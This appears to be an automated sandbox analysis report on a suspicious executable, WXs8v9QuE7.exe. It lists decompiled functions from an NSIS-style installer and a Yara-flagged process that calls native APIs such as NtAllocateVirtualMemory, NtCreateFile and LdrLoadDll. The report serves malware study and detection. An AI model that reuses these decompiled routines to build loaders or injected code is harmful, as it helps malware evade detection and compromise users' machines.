                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                    • String ID: Error launching installer
                                                                                                                    • API String ID: 3712363035-66219284
                                                                                                                    • Opcode ID: d49f44695edecb7d462127f99e45c7a2ce7d09c155a88fefc4d0509107339d45
                                                                                                                    • Instruction ID: 7090b7fc8b0b8bfe0e18f62cc41de09a41a9c6505e722368f6ae49628a4dc155
                                                                                                                    • Opcode Fuzzy Hash: d49f44695edecb7d462127f99e45c7a2ce7d09c155a88fefc4d0509107339d45
                                                                                                                    • Instruction Fuzzy Hash: F6E0ECB4A00219BBDB109F64ED09AABBBBCFB00304F50C521E910E2160E774E950CA69
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00403556, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00403556() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x41f4f4;
				_t3 = E0040353B(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x41f4f4 =  *0x41f4f4 & 0x00000000;
				return _t3;
			}







                                                                                                                    0x00403557
                                                                                                                    0x0040355f
                                                                                                                    0x00403566
                                                                                                                    0x00403569
                                                                                                                    0x00403569
                                                                                                                    0x0040356b
                                                                                                                    0x00403570
                                                                                                                    0x00403577
                                                                                                                    0x0040357d
                                                                                                                    0x00403581
                                                                                                                    0x00403582
                                                                                                                    0x0040358a

                                                                                                                    APIs
                                                                                                                    • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,?,0040352E,00403337,00000020), ref: 00403570
                                                                                                                    • GlobalFree.KERNEL32 ref: 00403577
                                                                                                                    Strings
                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403568
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Free$GlobalLibrary
                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                    • API String ID: 1100898210-823278215
                                                                                                                    • Opcode ID: a60e2798f856a3438fb1e72b6635fdebc83eaeade0927d8150105d3265ee1b70
                                                                                                                    • Instruction ID: e2315670824f3ca0981a6a6bf9743b5050639b1b799e450ff7e3175358b78d1c
                                                                                                                    • Opcode Fuzzy Hash: a60e2798f856a3438fb1e72b6635fdebc83eaeade0927d8150105d3265ee1b70
                                                                                                                    • Instruction Fuzzy Hash: 10E08C329010206BC6215F08FD0479A7A6C6B44B22F11413AE804772B0C7742D424A88
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004056D2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E004056D2(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                                                                                    0x004056d3
                                                                                                                    0x004056dd
                                                                                                                    0x004056df
                                                                                                                    0x004056e6
                                                                                                                    0x004056ee
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004056ee
                                                                                                                    0x004056f0
                                                                                                                    0x004056f5

                                                                                                                    APIs
                                                                                                                    • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\WXs8v9QuE7.exe,C:\Users\user\Desktop\WXs8v9QuE7.exe,80000000,00000003), ref: 004056D8
                                                                                                                    • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\WXs8v9QuE7.exe,C:\Users\user\Desktop\WXs8v9QuE7.exe,80000000,00000003), ref: 004056E6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: CharPrevlstrlen
                                                                                                                    • String ID: C:\Users\user\Desktop
                                                                                                                    • API String ID: 2709904686-1246513382
                                                                                                                    • Opcode ID: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                                                                                    • Instruction ID: dce4988d3f9ae1539138201c89f565164349ec5ceb08caa00e339266b5a49006
                                                                                                                    • Opcode Fuzzy Hash: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                                                                                    • Instruction Fuzzy Hash: 7FD0A772809D701EF30363108C04B8FBA48CF12310F490862E042E6191C27C6C414BBD
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 100010D6, Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E100010D6(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char* _t17;
				char _t19;
				void* _t20;
				void* _t24;
				void* _t27;
				void* _t31;
				void* _t37;
				void* _t39;
				void* _t40;
				signed int _t43;
				void* _t52;
				char* _t53;
				char* _t55;
				void* _t56;
				void* _t58;

				 *0x10004058 = _a8;
				 *0x1000405c = _a16;
				 *0x10004060 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004038, E1000189E, _t52);
				_t43 =  *0x10004058 +  *0x10004058 * 4 << 2;
				_t17 = E10001561();
				_a8 = _t17;
				_t53 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_a8);
				} else {
					do {
						_t19 =  *_t53;
						_t55 = _t53 + 1;
						_t58 = _t19 - 0x6c;
						if(_t58 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t53 = _t55 + 1;
								_t24 = E1000159E(E100015E5( *_t55 - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t27 = _t20;
							if(_t27 == 0) {
								L10:
								_t53 = _t55 + 1;
								_t24 = E1000160E( *_t55 - 0x30, E10001561());
								goto L13;
							}
							L7:
							if(_t27 == 1) {
								_t31 = GlobalAlloc(0x40, _t43 + 4);
								 *_t31 =  *0x10004030;
								 *0x10004030 = _t31;
								E10001854(_t31 + 4,  *0x10004060, _t43);
								_t56 = _t56 + 0xc;
							}
							goto L14;
						}
						if(_t58 == 0) {
							L17:
							_t34 =  *0x10004030;
							if( *0x10004030 != 0) {
								E10001854( *0x10004060, _t34 + 4, _t43);
								_t37 =  *0x10004030;
								_t56 = _t56 + 0xc;
								GlobalFree(_t37);
								 *0x10004030 =  *_t37;
							}
							goto L14;
						}
						_t39 = _t19 - 0x4c;
						if(_t39 == 0) {
							goto L17;
						}
						_t40 = _t39 - 4;
						if(_t40 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L12;
						}
						_t27 = _t40;
						if(_t27 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t53 != 0);
					goto L16;
				}
			}


















                                                                                                                    0x100010dd
                                                                                                                    0x100010e5
                                                                                                                    0x100010f9
                                                                                                                    0x10001101
                                                                                                                    0x1000110c
                                                                                                                    0x1000110f
                                                                                                                    0x10001117
                                                                                                                    0x1000111a
                                                                                                                    0x1000111c
                                                                                                                    0x100011ba
                                                                                                                    0x100011c6
                                                                                                                    0x10001122
                                                                                                                    0x10001123
                                                                                                                    0x10001123
                                                                                                                    0x10001126
                                                                                                                    0x10001127
                                                                                                                    0x1000112a
                                                                                                                    0x100011f9
                                                                                                                    0x100011fc
                                                                                                                    0x10001194
                                                                                                                    0x1000119a
                                                                                                                    0x100011a2
                                                                                                                    0x100011a7
                                                                                                                    0x100011aa
                                                                                                                    0x00000000
                                                                                                                    0x100011aa
                                                                                                                    0x100011ff
                                                                                                                    0x10001200
                                                                                                                    0x1000117c
                                                                                                                    0x10001182
                                                                                                                    0x1000118a
                                                                                                                    0x00000000
                                                                                                                    0x1000118a
                                                                                                                    0x10001148
                                                                                                                    0x10001149
                                                                                                                    0x10001151
                                                                                                                    0x1000115e
                                                                                                                    0x10001166
                                                                                                                    0x1000116f
                                                                                                                    0x10001174
                                                                                                                    0x10001174
                                                                                                                    0x00000000
                                                                                                                    0x10001149
                                                                                                                    0x10001130
                                                                                                                    0x100011c7
                                                                                                                    0x100011c7
                                                                                                                    0x100011ce
                                                                                                                    0x100011db
                                                                                                                    0x100011e0
                                                                                                                    0x100011e5
                                                                                                                    0x100011eb
                                                                                                                    0x100011f1
                                                                                                                    0x100011f1
                                                                                                                    0x00000000
                                                                                                                    0x100011ce
                                                                                                                    0x10001136
                                                                                                                    0x10001139
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1000113f
                                                                                                                    0x10001142
                                                                                                                    0x10001191
                                                                                                                    0x00000000
                                                                                                                    0x10001191
                                                                                                                    0x10001145
                                                                                                                    0x10001146
                                                                                                                    0x10001179
                                                                                                                    0x00000000
                                                                                                                    0x10001179
                                                                                                                    0x00000000
                                                                                                                    0x100011b0
                                                                                                                    0x100011b0
                                                                                                                    0x00000000
                                                                                                                    0x100011b9

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 10001561: lstrcpyA.KERNEL32(00000000,?,?,?,10001804,?,10001017), ref: 1000157E
                                                                                                                      • Part of subcall function 10001561: GlobalFree.KERNEL32 ref: 1000158F
                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 10001151
                                                                                                                    • GlobalFree.KERNEL32 ref: 100011AA
                                                                                                                    • GlobalFree.KERNEL32 ref: 100011BD
                                                                                                                    • GlobalFree.KERNEL32 ref: 100011EB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.236719394.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.236714134.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.236724294.0000000010003000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.236729631.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$Free$Alloclstrcpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 852173138-0
                                                                                                                    • Opcode ID: 335bfb3eee5401576ccd7ed7eaa48b8bc68e5a6de95141012eee8b581a67eaa8
                                                                                                                    • Instruction ID: f3c6a4d1cb6ed30c88921a1fa743563ab198a0ac7443c24c90fc5835e0779d4c
                                                                                                                    • Opcode Fuzzy Hash: 335bfb3eee5401576ccd7ed7eaa48b8bc68e5a6de95141012eee8b581a67eaa8
                                                                                                                    • Instruction Fuzzy Hash: 4031CDB5804655AFF705CF64DCC9AEA7FFCEB092D1B164029FA45D726CEB3099008B64
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004057E4, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E004057E4(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                                                                                                                    0x004057f0
                                                                                                                    0x004057f2
                                                                                                                    0x0040581a
                                                                                                                    0x004057ff
                                                                                                                    0x00405804
                                                                                                                    0x0040580f
                                                                                                                    0x00000000
                                                                                                                    0x0040582c
                                                                                                                    0x00405818
                                                                                                                    0x00405818
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057EB
                                                                                                                    • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405804
                                                                                                                    • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405812
                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 190613189-0
                                                                                                                    • Opcode ID: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                                                                                                    • Instruction ID: 6e20b17ba46ab238fcbb7c8296b2df733f1dbfa59429a89b2dba5ca226b3377d
                                                                                                                    • Opcode Fuzzy Hash: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                                                                                                    • Instruction Fuzzy Hash: C2F02733209D51ABC202AB255C00A2F7E98EF91320B24003AF440F2180D339AC219BFB
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Analysis Process: WXs8v9QuE7.exe PID: 5880 Parent PID: 5432 WXs8v9QuE7.exeCOMMON

                                                                                                                    Executed Functions

                                                                                                                    Function 0041827A, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38filenativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FileRead
                                                                                                                    • String ID: !:A$b=A$b=A
                                                                                                                    • API String ID: 2738559852-704622139
                                                                                                                    • Opcode ID: bda75b2bb32c1a71e4897bbae7e9420c47a96c989b8645594af979ed0517f1bc
                                                                                                                    • Instruction ID: 0e954488afad77a3cd6483d6c9f2cc5304775cc5763836557ad725b5a7750ece
                                                                                                                    • Opcode Fuzzy Hash: bda75b2bb32c1a71e4897bbae7e9420c47a96c989b8645594af979ed0517f1bc
                                                                                                                    • Instruction Fuzzy Hash: C6F0E7B6600108ABCB14DF99DC81EEB77A9EF9C354F118258FA1DA7241DA30E811CBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00418280, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 37%
                                                                                                                    			E00418280(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DD0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a21
				_t6 =  &_a32; // 0x413d62
				_t12 =  &_a8; // 0x413d62
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                                                                                                                    0x00418283
                                                                                                                    0x0041828f
                                                                                                                    0x00418297
                                                                                                                    0x0041829c
                                                                                                                    0x004182a2
                                                                                                                    0x004182bd
                                                                                                                    0x004182c5
                                                                                                                    0x004182c9

                                                                                                                    APIs
                                                                                                                    • NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FileRead
                                                                                                                    • String ID: !:A$b=A$b=A
                                                                                                                    • API String ID: 2738559852-704622139
                                                                                                                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                    • Instruction ID: 51f5fae1d88b5840d166f8ea9f31b1482cd02544441b85bb92b9de754d914906
                                                                                                                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                    • Instruction Fuzzy Hash: F0F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00409B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00409B30(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AB60( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF80(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B200( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419310(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                                                                    0x00409b4c
                                                                                                                    0x00409b4f
                                                                                                                    0x00409b54
                                                                                                                    0x00409b59
                                                                                                                    0x00409b63
                                                                                                                    0x00409b68
                                                                                                                    0x00409b6b
                                                                                                                    0x00409b6d
                                                                                                                    0x00409b75
                                                                                                                    0x00409b7a
                                                                                                                    0x00409b7a
                                                                                                                    0x00409b81
                                                                                                                    0x00409b89
                                                                                                                    0x00409b8c
                                                                                                                    0x00409b8e
                                                                                                                    0x00409ba2
                                                                                                                    0x00000000
                                                                                                                    0x00409ba4
                                                                                                                    0x00409baa
                                                                                                                    0x00409b5e
                                                                                                                    0x00409b5e
                                                                                                                    0x00409b5e

                                                                                                                    APIs
                                                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Load
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2234796835-0
                                                                                                                    • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                    • Instruction ID: 4e6e3ee69d5942d72351b9e79d7f2bfe549f68bd28f2ef5b77caac8f1f18b979
                                                                                                                    • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                    • Instruction Fuzzy Hash: BB0152B5E0010DA7DB10DAA1DC42FDEB378AB54308F0041A5E918A7281F635EB54C795
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004181D0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E004181D0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DD0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                                                                                    0x004181df
                                                                                                                    0x004181e7
                                                                                                                    0x0041821d
                                                                                                                    0x00418221

                                                                                                                    APIs
                                                                                                                    • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 823142352-0
                                                                                                                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                    • Instruction ID: 4ba06d0811943408d915368c3acdb1aee86cb039c5ce671b45e9a6de03e682c0
                                                                                                                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                    • Instruction Fuzzy Hash: EAF0B2B2200208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004181CE, Relevance: 1.5, APIs: 1, Instructions: 39filenativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 79%
                                                                                                                    			E004181CE(HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, struct _ERESOURCE_LITE _a16, struct _GUID _a20, long _a24, long _a28, long _a32, long _a36, void* _a40, long _a44) {
				intOrPtr _v0;
				long _t21;
				void* _t31;

				_push(0xec8b5536);
				_t15 = _v0;
				_t3 = _t15 + 0xc40; // 0xc40
				E00418DD0(_t31, _v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44); // executed
				return _t21;
			}






                                                                                                                    0x004181ce
                                                                                                                    0x004181d3
                                                                                                                    0x004181df
                                                                                                                    0x004181e7
                                                                                                                    0x0041821d
                                                                                                                    0x00418221

                                                                                                                    APIs
                                                                                                                    • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 823142352-0
                                                                                                                    • Opcode ID: c0b71c95aee51191c1fe91e0108249c8517723fa1d888ca7754ba538bce26533
                                                                                                                    • Instruction ID: fd5f7433f2a34c93221db380210f24dbc3382fffcce8468c86bd18cbacf7aea4
                                                                                                                    • Opcode Fuzzy Hash: c0b71c95aee51191c1fe91e0108249c8517723fa1d888ca7754ba538bce26533
                                                                                                                    • Instruction Fuzzy Hash: 9AF0C4B2200108AFCB08CF88DD84EEB37A9AF8C354F15824CFA0D97240D630E851CBA4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004183AB, Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 82%
                                                                                                                    			E004183AB(void* __eax, signed int __ebx, signed int __edi, void* __esi, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t17;
				signed int _t26;

				_t26 = __edi & __ebx;
				asm("adc [ebp+0x55], ebp");
				_t13 = _a4;
				_t4 = _t13 + 0xc60; // 0xca0
				E00418DD0(_t26, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t17 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t17;
			}





                                                                                                                    0x004183ab
                                                                                                                    0x004183ae
                                                                                                                    0x004183b3
                                                                                                                    0x004183bf
                                                                                                                    0x004183c7
                                                                                                                    0x004183e9
                                                                                                                    0x004183ed

                                                                                                                    APIs
                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2167126740-0
                                                                                                                    • Opcode ID: c36d259eba02ca8ef7349eba16b64d68b7431a5e2108da57c4f6db2edc8418dd
                                                                                                                    • Instruction ID: 3679ede50116ae23d234e94d74696cb06d5389d83a42e90e6644c665e332e4af
                                                                                                                    • Opcode Fuzzy Hash: c36d259eba02ca8ef7349eba16b64d68b7431a5e2108da57c4f6db2edc8418dd
                                                                                                                    • Instruction Fuzzy Hash: 16F0F8B2204218AFCB14DF89DC91EEB77A9AF88754F15815DFE0897281C670E811CBE4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004183B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E004183B0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DD0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                                                                    0x004183bf
